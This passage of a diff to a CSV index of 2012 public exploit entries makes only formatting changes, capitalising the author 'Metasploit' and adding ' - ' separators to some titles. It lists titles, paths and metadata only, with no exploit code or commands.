Binetti",php,webapps,0 -18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow",2012-04-04,metasploit,windows,remote,0 +18697,platforms/windows/remote/18697.rb,"NetOp Remote Control Client 9.5 - Buffer Overflow",2012-04-04,Metasploit,windows,remote,0 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection",2012-01-23,Vulnerability-Lab,php,webapps,0 18701,platforms/php/webapps/18701.txt,"phpPaleo - Local File Inclusion",2012-04-04,"Mark Stanislav",php,webapps,0 18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 @@ -15967,10 +15967,10 @@ id,file,description,date,author,platform,type,port 18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS",2012-01-26,Cyber-Crystal,php,webapps,0 18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (Metasploit)",2012-01-26,"Craig Freyman",windows,remote,0 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections",2012-01-26,Cyber-Crystal,php,webapps,0 -18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,metasploit,windows,remote,0 +18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,Metasploit,windows,remote,0 18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 - 'proc_deutf()' Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 -18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,metasploit,windows,remote,0 -18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 +18426,platforms/windows/remote/18426.rb,"Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)",2012-01-28,Metasploit,windows,remote,0 +18427,platforms/windows/dos/18427.txt,"Tracker Software pdfSaver ActiveX 3.60 - (pdfxctrl.dll) Stack Buffer Overflow (SEH)",2012-01-29,LiquidWorm,windows,dos,0 18429,platforms/php/webapps/18429.pl,"4Images 1.7.6-9 - CSRF Inject PHP Code",2012-01-30,Or4nG.M4N,php,webapps,0 18430,platforms/multiple/webapps/18430.txt,"Campaign Enterprise 11.0.421 SQLi",2012-01-30,"Craig Freyman",multiple,webapps,0 18431,platforms/multiple/webapps/18431.txt,"Ajax Upload Arbitrary File Upload",2012-01-30,"Daniel Godoy",multiple,webapps,0 @@ -15981,15 +15981,15 @@ id,file,description,date,author,platform,type,port 18437,platforms/windows/remote/18437.txt,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Remote Code Execution Exploit",2012-01-31,Abysssec,windows,remote,0 18438,platforms/php/webapps/18438.txt,"Ez Album Blind SQL Injection",2012-01-31,"Red Security TEAM",php,webapps,0 18439,platforms/php/webapps/18439.txt,"PragmaMX 1.2.10 Persistent XSS",2012-01-31,HauntIT,php,webapps,0 -18440,platforms/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 (officeviewermme.ocx) BoF PoC",2012-01-31,LiquidWorm,windows,dos,0 +18440,platforms/windows/dos/18440.txt,"EdrawSoft Office Viewer Component ActiveX 5.6 - (officeviewermme.ocx) BoF PoC",2012-01-31,LiquidWorm,windows,dos,0 18441,platforms/php/webapps/18441.txt,"Vastal I-Tech Agent Zone (search.php) Blind SQL Injection",2012-01-31,"Cagri Tepebasili",php,webapps,0 18442,platforms/multiple/remote/18442.html,"Apache httpOnly Cookie Disclosure",2012-01-31,pilate,multiple,remote,0 18443,platforms/php/webapps/18443.txt,"swDesk - Multiple Vulnerabilities",2012-02-01,"Red Security TEAM",php,webapps,0 18444,platforms/php/webapps/18444.txt,"sit! support incident tracker 3.64 - Multiple Vulnerabilities",2012-02-01,"High-Tech Bridge SA",php,webapps,0 18446,platforms/android/remote/18446.html,"Webkit Normalize Bug - Android 2.2",2012-02-01,"MJ Keith",android,remote,0 18447,platforms/asp/webapps/18447.txt,"MailEnable Webmail Cross-Site Scripting",2012-01-13,"Sajjad Pourali",asp,webapps,0 -18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",2012-02-02,metasploit,windows,remote,0 -18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,metasploit,windows,remote,0 +18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",2012-02-02,Metasploit,windows,remote,0 +18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,Metasploit,windows,remote,0 18451,platforms/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent XSS Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps,0 18452,platforms/multiple/webapps/18452.txt,"Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service",2012-02-02,"SecPod Research",windows,dos,0 @@ -16002,7 +16002,7 @@ id,file,description,date,author,platform,type,port 18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 - ActiveX Buffer Overflow DoS",2012-02-04,"Senator of Pirates",windows,dos,0 18463,platforms/windows/dos/18463.html,"PDF Viewer Component ActiveX DoS",2012-02-05,"Senator of Pirates",windows,dos,0 18464,platforms/php/webapps/18464.html,"GAzie <= 5.20 - Cross-Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 -18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 (base_qry_main.php t_view) SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 +18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 - (base_qry_main.php t_view) SQL Injection",2012-02-06,"a.kadir altan",php,webapps,0 18466,platforms/php/webapps/18466.txt,"Tube Ace(Adult PHP Tube Script) SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 18467,platforms/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,php,webapps,0 18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - CSRF",2012-02-07,"Vaibhav Gupta",php,webapps,0 @@ -16012,19 +16012,19 @@ id,file,description,date,author,platform,type,port 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 - File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 -18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,metasploit,windows,remote,0 -18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,metasploit,windows,remote,0 +18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow",2012-02-10,Metasploit,windows,remote,0 +18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow",2012-02-10,Metasploit,windows,remote,0 18480,platforms/php/webapps/18480.txt,"Dolibarr CMS 3.2.0 < Alpha - File Include Vulnerabilities",2012-02-10,Vulnerability-Lab,php,webapps,0 18481,platforms/windows/dos/18481.py,"jetVideo 8.0.2 - Denial of Service",2012-02-10,"Senator of Pirates",windows,dos,0 18483,platforms/php/webapps/18483.txt,"Fork CMS 3.2.4 - (LFI/XSS) Multiple Vulnerabilities",2012-02-12,"Avram Marius",php,webapps,0 18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B (ADSL Router) CSRF",2012-02-20,"Ivano Binetti",hardware,webapps,0 -18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object GM_Song Structure Handling",2012-02-16,metasploit,windows,remote,0 +18485,platforms/windows/remote/18485.rb,"Java MixerSequencer Object GM_Song Structure Handling",2012-02-16,Metasploit,windows,remote,0 18487,platforms/php/webapps/18487.html,"SocialCMS 1.0.2 - CSRF",2012-02-16,"Ivano Binetti",php,webapps,0 18488,platforms/windows/dos/18488.txt,"Novell GroupWise Messenger <= 2.1.0 - Arbitrary Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18489,platforms/windows/dos/18489.txt,"Novell GroupWise Messenger <= 2.1.0 Memory Corruption",2012-02-16,"Luigi Auriemma",windows,dos,8300 18490,platforms/windows/dos/18490.txt,"Novell GroupWise Messenger Client <= 2.1.0 Unicode Stack Overflow",2012-02-16,"Luigi Auriemma",windows,dos,0 18491,platforms/windows/dos/18491.txt,"xnview <= 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 -18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,metasploit,linux,remote,0 +18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,Metasploit,linux,remote,0 18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 - Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Include",2012-02-17,Vulnerability-Lab,php,webapps,0 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - CSRF (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 @@ -16038,7 +16038,7 @@ id,file,description,date,author,platform,type,port 18561,platforms/php/webapps/18561.txt,"lizard cart SQLi (search.php)",2012-03-05,"Number 7",php,webapps,0 18563,platforms/php/webapps/18563.txt,"ForkCMS 3.2.5 - Multiple Vulnerabilities",2012-02-21,"Ivano Binetti",php,webapps,0 18506,platforms/php/webapps/18506.txt,"BRIM < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 -18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin Command Line Argument Injection (2012)",2012-02-24,metasploit,windows,remote,0 +18520,platforms/windows/remote/18520.rb,"Sun Java Web Start Plugin Command Line Argument Injection (2012)",2012-02-24,Metasploit,windows,remote,0 18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK <= 1.0.5 - (Steal Authentication Credentials) Multiple Vulnerabilities",2012-02-22,"Ivano Binetti",php,webapps,0 @@ -16046,27 +16046,27 @@ id,file,description,date,author,platform,type,port 18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player <= 3.2.0.61061 - Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 -18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,metasploit,windows,remote,0 -18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,metasploit,windows,local,0 +18514,platforms/windows/remote/18514.rb,"TrendMicro Control Manger <= 5.5 CmdProcessor.exe - Stack Buffer Overflow",2012-02-23,Metasploit,windows,remote,0 +18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow",2012-02-23,Metasploit,windows,local,0 18516,platforms/php/webapps/18516.txt,"phpDenora <= 1.4.6 - Multiple SQL Injection Vulnerabilities",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 -18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 (Eng/Ita) Remote File Upload Remote Code Execution",2012-02-23,"Danny Moules",php,webapps,0 -18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 EXEC_CMD Remote Code Execution",2012-02-25,metasploit,windows,remote,0 +18518,platforms/php/webapps/18518.rb,"The Uploader 2.0.4 - (Eng/Ita) Remote File Upload Remote Code Execution",2012-02-23,"Danny Moules",php,webapps,0 +18521,platforms/windows/remote/18521.rb,"HP Data Protector 6.1 EXEC_CMD Remote Code Execution",2012-02-25,Metasploit,windows,remote,0 18522,platforms/php/webapps/18522.php,"cPassMan 1.82 - Remote Command Execution Exploit",2012-02-25,ls,php,webapps,0 -18523,platforms/php/webapps/18523.txt,"webgrind 1.0 (file param) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 +18523,platforms/php/webapps/18523.txt,"webgrind 1.0 - (file param) Local File Inclusion",2012-02-25,LiquidWorm,php,webapps,0 18524,platforms/windows/dos/18524.py,"Tiny HTTP Server <= 1.1.9 - Remote Crash PoC",2012-02-25,localh0t,windows,dos,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery SQL Injection",2012-02-25,CorryL,php,webapps,0 18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin & Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0 -18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,metasploit,windows,local,0 +18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - (.pls) Stack Buffer Overflow",2012-03-02,Metasploit,windows,local,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox 4.0.1 - Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 18534,platforms/windows/remote/18534.py,"Sysax Multi Server 5.53 - SFTP Post Auth SEH Exploit",2012-02-27,"Craig Freyman",windows,remote,0 18535,platforms/windows/remote/18535.py,"Sysax <= 5.53 - SSH Username BoF Pre Auth RCE (Egghunter)",2012-02-27,"Craig Freyman",windows,remote,0 18536,platforms/php/webapps/18536.txt,"WebfolioCMS <= 1.1.4 - CSRF (Add Admin/Modify Pages)",2012-02-28,"Ivano Binetti",php,webapps,0 18702,platforms/php/webapps/18702.txt,"Hotel Booking Portal - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 -18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,metasploit,windows,remote,0 -18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 Profile",2012-02-29,metasploit,windows,remote,0 +18538,platforms/windows/remote/18538.rb,"ASUS Net4Switch - ipswcom.dll ActiveX Stack Buffer Overflow",2012-02-29,Metasploit,windows,remote,0 +18539,platforms/windows/remote/18539.rb,"IBM Personal Communications I-Series Access WorkStation 5.9 Profile",2012-02-29,Metasploit,windows,remote,0 18540,platforms/hardware/webapps/18540.txt,"Yealink VOIP Phone Persistent Cross-Site Scripting",2012-02-29,"Narendra Shinde",hardware,webapps,0 18541,platforms/windows/dos/18541.py,"Netmechanica NetDecision HTTP Server Denial of Service",2012-02-29,"SecPod Research",windows,dos,0 18542,platforms/windows/remote/18542.txt,"Netmechanica NetDecision Traffic Grapher Server Information Disclosure",2012-02-29,"SecPod Research",windows,remote,0 @@ -16075,16 +16075,16 @@ id,file,description,date,author,platform,type,port 18545,platforms/php/webapps/18545.txt,"Wolf CMS 0.7.5 - Multiple Vulnerabilities",2012-02-29,longrifle0x,php,webapps,0 18560,platforms/php/webapps/18560.txt,"Symfony2 - Local File Disclosure",2012-03-05,"Sense of Security",php,webapps,0 18546,platforms/windows/dos/18546.txt,"Novell Groupwise Address Book Remote Code Execution",2012-03-01,"Francis Provencher",windows,dos,0 -18548,platforms/windows/local/18548.rb,"VLC Media Player RealText Subtitle Overflow",2012-03-02,metasploit,windows,local,0 +18548,platforms/windows/local/18548.rb,"VLC Media Player RealText Subtitle Overflow",2012-03-02,Metasploit,windows,local,0 18549,platforms/php/webapps/18549.txt,"phxEventManager 2.0 beta 5 - search.php search_terms SQL Injection",2012-03-02,skysbsb,php,webapps,0 -18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,metasploit,php,remote,0 +18565,platforms/php/remote/18565.rb,"LotusCMS 3.0 eval() Remote Command Execution",2012-03-07,Metasploit,php,remote,0 18564,platforms/php/webapps/18564.txt,"Drupal CMS 7.12 - Multiple Vulnerabilities",2012-03-02,"Ivano Binetti",php,webapps,0 18552,platforms/windows/dos/18552.pl,"Passport PC To Host Malformed .zws file Memory Corruption",2012-03-03,Silent_Dream,windows,dos,0 18553,platforms/multiple/webapps/18553.txt,"Rivettracker <= 1.03 - Multiple SQL injection",2012-03-03,"Ali Raheem",multiple,webapps,0 18554,platforms/php/webapps/18554.txt,"Timesheet Next Gen 1.5.2 - Multiple SQLi",2012-03-03,G13,php,webapps,0 18555,platforms/windows/remote/18555.txt,"FlashFXP 4.1.8.1701 - Buffer Overflow",2012-03-03,Vulnerability-Lab,windows,remote,0 18556,platforms/php/webapps/18556.txt,"Endian UTM Firewall 2.4.x & 2.5.0 - Multiple Web Vulnerabilities",2012-03-03,Vulnerability-Lab,php,webapps,0 -18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH Username Buffer Overflow (Metasploit)",2012-03-04,metasploit,windows,remote,0 +18557,platforms/windows/remote/18557.rb,"Sysax 5.53 - SSH Username Buffer Overflow (Metasploit)",2012-03-04,Metasploit,windows,remote,0 18558,platforms/php/webapps/18558.txt,"DZCP (deV!L_z Clanportal) Witze Addon 0.9 - SQL Injection",2012-03-04,"Easy Laster",php,webapps,0 18559,platforms/php/webapps/18559.txt,"AneCMS 2e2c583 - LFI Exploit",2012-03-04,"I2sec-Jong Hwan Park",php,webapps,0 18566,platforms/asp/webapps/18566.txt,"Iciniti Store - SQL Injection",2012-03-07,"Sense of Security",asp,webapps,0 @@ -16093,7 +16093,7 @@ id,file,description,date,author,platform,type,port 18600,platforms/multiple/dos/18600.txt,"presto! pagemanager <= 9.01 - Multiple Vulnerabilities",2012-03-14,"Luigi Auriemma",multiple,dos,0 18601,platforms/multiple/dos/18601.txt,"EMC NetWorker <= 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",multiple,dos,0 18571,platforms/php/webapps/18571.txt,"promise webpam 2.2.0.13 - Multiple Vulnerabilities",2012-03-07,LiquidWorm,php,webapps,0 -18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 - 'cprt' Overflow",2012-03-08,metasploit,windows,remote,0 +18572,platforms/windows/remote/18572.rb,"Adobe Flash Player .mp4 - 'cprt' Overflow",2012-03-08,Metasploit,windows,remote,0 18575,platforms/php/webapps/18575.txt,"RazorCMS <= 1.2.1 STABLE CSRF (Delete Web Pages)",2012-03-08,"Ivano Binetti",php,webapps,0 18578,platforms/php/webapps/18578.txt,"PHP Address Book 6.2.12 - Multiple security vulnerabilities",2012-03-10,"Stefan Schurtz",php,webapps,0 18574,platforms/php/webapps/18574.txt,"RazorCMS <= 1.2.1 STABLE File Upload",2012-03-08,"i2sec_Hyo jun Oh",php,webapps,0 @@ -16117,7 +16117,7 @@ id,file,description,date,author,platform,type,port 18599,platforms/php/webapps/18599.txt,"asaanCart XSS/LFI Vulnerabilities",2012-03-14,"Number 7",php,webapps,0 18602,platforms/windows/dos/18602.txt,"Epson EventManager <= 2.50 - Denial of Service",2012-03-14,"Luigi Auriemma",windows,dos,0 18603,platforms/windows/webapps/18603.txt,"TVersity <= 1.9.7 - Arbitrary File Download",2012-03-14,"Luigi Auriemma",windows,webapps,0 -18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,metasploit,windows,remote,0 +18604,platforms/windows/remote/18604.rb,"NetDecision 4.5.1 HTTP Server Buffer Overflow",2012-03-15,Metasploit,windows,remote,0 18605,platforms/windows/webapps/18605.txt,"sockso <= 1.5 - Directory Traversal",2012-03-15,"Luigi Auriemma",windows,webapps,0 18606,platforms/windows/dos/18606.txt,"Microsoft Terminal Services Use After Free (MS12-020)",2012-03-16,"Luigi Auriemma",windows,dos,0 18607,platforms/php/webapps/18607.txt,"OneFileCMS 1.1.5 - Local File Inclusion",2012-03-16,mr.pr0n,php,webapps,0 @@ -16142,14 +16142,14 @@ id,file,description,date,author,platform,type,port 18631,platforms/php/webapps/18631.txt,"OneForum (topic.php) SQL Injection",2012-03-20,"Red Security TEAM",php,webapps,0 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 18633,platforms/windows/dos/18633.txt,"Adobe Photoshop 12.1 Tiff Parsing Use-After-Free",2012-03-20,"Francis Provencher",windows,dos,0 -18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk ActiveX BackImage",2012-03-21,metasploit,windows,remote,0 +18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk ActiveX BackImage",2012-03-21,Metasploit,windows,remote,0 18636,platforms/windows/dos/18636.txt,"Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow",2012-03-21,LiquidWorm,windows,dos,0 18637,platforms/windows/dos/18637.txt,"Oreans WinLicense 2.1.8.0 - XML File Handling Unspecified Memory Corruption",2012-03-21,LiquidWorm,windows,dos,0 18638,platforms/hardware/webapps/18638.txt,"D-Link DIR-605 - CSRF",2012-03-21,iqzer0,hardware,webapps,0 18639,platforms/php/webapps/18639.txt,"phpList 2.10.17 - Remote SQL Injection and XSS",2012-03-21,LiquidWorm,php,webapps,0 18640,platforms/windows/remote/18640.txt,"Google Talk gtalk:// Deprecated Uri Handler Parameter Injection",2012-03-22,rgod,windows,remote,0 18641,platforms/windows/dos/18641.txt,"Cisco Linksys WVC200 Wireless-G PTZ Internet Video Camera PlayerPT ActiveX Control PlayerPT.ocx sprintf Buffer Overflow",2012-03-22,rgod,windows,dos,0 -18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,metasploit,windows,remote,0 +18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)",2012-03-22,Metasploit,windows,remote,0 18643,platforms/windows/dos/18643.py,"Ricoh DC Software DL-10 FTP Server (SR10.exe) <= 1.1.0.6 - Remote Buffer Overflow",2012-03-22,"Julien Ahrens",windows,dos,0 18644,platforms/php/webapps/18644.txt,"vBShout Persistent XSS",2012-03-22,ToiL,php,webapps,0 18646,platforms/hardware/webapps/18646.txt,"Cyberoam UTM Multiiple Vulnerabilities",2012-03-22,"Saurabh Harit",hardware,webapps,0 @@ -16159,18 +16159,18 @@ id,file,description,date,author,platform,type,port 18650,platforms/php/webapps/18650.py,"FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution Exploit",2012-03-23,muts,php,webapps,0 18651,platforms/asp/webapps/18651.txt,"Sitecom WLM-2501 new Multiple CSRF Vulnerabilities",2012-03-23,"Ivano Binetti",asp,webapps,0 18652,platforms/php/webapps/18652.txt,"Wolfcms <= 0.75 - (CSRF/XSS) Multiple Vulnerabilities",2012-03-23,"Ivano Binetti",php,webapps,0 -18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 -18655,platforms/php/webapps/18655.php,"phpFox <= 3.0.1 (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 +18654,platforms/windows/dos/18654.txt,"Spotify 0.8.2.610 - (search func) Memory Exhaustion Exploit",2012-03-23,LiquidWorm,windows,dos,0 +18655,platforms/php/webapps/18655.php,"phpFox <= 3.0.1 - (ajax.php) Remote Command Execution Exploit",2012-03-23,EgiX,php,webapps,0 18656,platforms/windows/local/18656.pl,"mmPlayer 2.2 - (.m3u) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18657,platforms/windows/local/18657.pl,"mmPlayer 2.2 - (.ppl) Local Buffer Overflow Exploit (SEH)",2012-03-23,"RjRjh Hack3r",windows,local,0 18695,platforms/windows/remote/18695.py,"Sysax <= 5.57 - Directory Traversal",2012-04-03,"Craig Freyman",windows,remote,0 -18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow'",2012-03-24,metasploit,windows,remote,0 -18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,metasploit,php,webapps,0 +18658,platforms/windows/remote/18658.rb,"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow'",2012-03-24,Metasploit,windows,remote,0 +18659,platforms/php/webapps/18659.rb,"FreePBX 2.10.0 / 2.9.0 - callmenum Remote Code Execution",2012-03-24,Metasploit,php,webapps,0 18660,platforms/php/webapps/18660.txt,"RIPS <= 0.53 - Multiple Local File Inclusion Vulnerabilities",2012-03-24,localh0t,php,webapps,0 18661,platforms/windows/dos/18661.txt,"RealPlayer .mp4 file handling memory corruption",2012-03-24,"Senator of Pirates",windows,dos,0 18676,platforms/php/webapps/18676.txt,"boastMachine <= 3.1 - CSRF Add Admin",2012-03-28,Dr.NaNo,php,webapps,0 18670,platforms/php/webapps/18670.txt,"PicoPublisher 2.0 - Remote SQL Injection",2012-03-28,ZeTH,php,webapps,0 -18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",2012-03-26,metasploit,windows,remote,0 +18666,platforms/windows/remote/18666.rb,"UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow",2012-03-26,Metasploit,windows,remote,0 18665,platforms/multiple/dos/18665.py,"PHP 5.4.0 Built-in Web Server - DoS PoC",2012-03-25,ls,multiple,dos,0 18667,platforms/php/webapps/18667.html,"Family CMS <= 2.9 - Multiple Vulnerabilities",2012-03-26,"Ahmed Elhady Mohamed",php,webapps,0 18668,platforms/php/webapps/18668.txt,"vBshop Multiple Persistent XSS Vulnerabilities",2012-03-26,ToiL,php,webapps,0 @@ -16180,7 +16180,7 @@ id,file,description,date,author,platform,type,port 18674,platforms/windows/remote/18674.txt,"Quest InTrust 10.4.x Annotation Objects ActiveX Control AnnotateX.dll Uninitialized Pointer Remote Code Execution",2012-03-28,rgod,windows,remote,0 18675,platforms/hardware/remote/18675.txt,"TRENDnet SecurView TV-IP121WN Wireless Internet Camera UltraMJCam ActiveX Control OpenFileDlg WideCharToMultiByte Remote Stack Buffer Overflow",2012-03-28,rgod,hardware,remote,0 18717,platforms/windows/dos/18717.txt,"AnvSoft Any Video Converter 4.3.6 - Multiple Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0 -18679,platforms/multiple/remote/18679.rb,"Java AtomicReferenceArray Type Violation",2012-03-30,metasploit,multiple,remote,0 +18679,platforms/multiple/remote/18679.rb,"Java AtomicReferenceArray Type Violation",2012-03-30,Metasploit,multiple,remote,0 18680,platforms/php/webapps/18680.txt,"coppermine 1.5.18 - Multiple Vulnerabilities",2012-03-30,waraxe,php,webapps,0 18681,platforms/windows/local/18681.txt,"Bitsmith PS Knowbase 3.2.3 - Buffer Overflow",2012-03-30,Vulnerability-Lab,windows,local,0 18682,platforms/php/webapps/18682.txt,"ArticleSetup Multiple Persistence Cross-Site Scripting and SQL Injection Vulnerabilities",2012-03-30,"SecPod Research",php,webapps,0 @@ -16196,39 +16196,39 @@ id,file,description,date,author,platform,type,port 18693,platforms/windows/local/18693.py,"BlazeVideo HDTV Player 6.6 Professional - SEH&DEP&ASLR",2012-04-03,b33f,windows,local,0 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda <= 2.2.8 - CSRF (Add Admin & Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0 18708,platforms/php/webapps/18708.txt,"GENU CMS SQL Injection",2012-04-05,"hordcode security",php,webapps,0 -18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,metasploit,windows,remote,0 -18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,metasploit,windows,local,0 +18709,platforms/windows/remote/18709.rb,"TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow",2012-04-06,Metasploit,windows,remote,0 +18710,platforms/windows/local/18710.rb,"Csound hetro File Handling Stack Buffer Overflow",2012-04-06,Metasploit,windows,local,0 18711,platforms/php/webapps/18711.txt,"w-cms 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0 -18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console Remote Command Execution",2012-04-08,metasploit,windows,remote,0 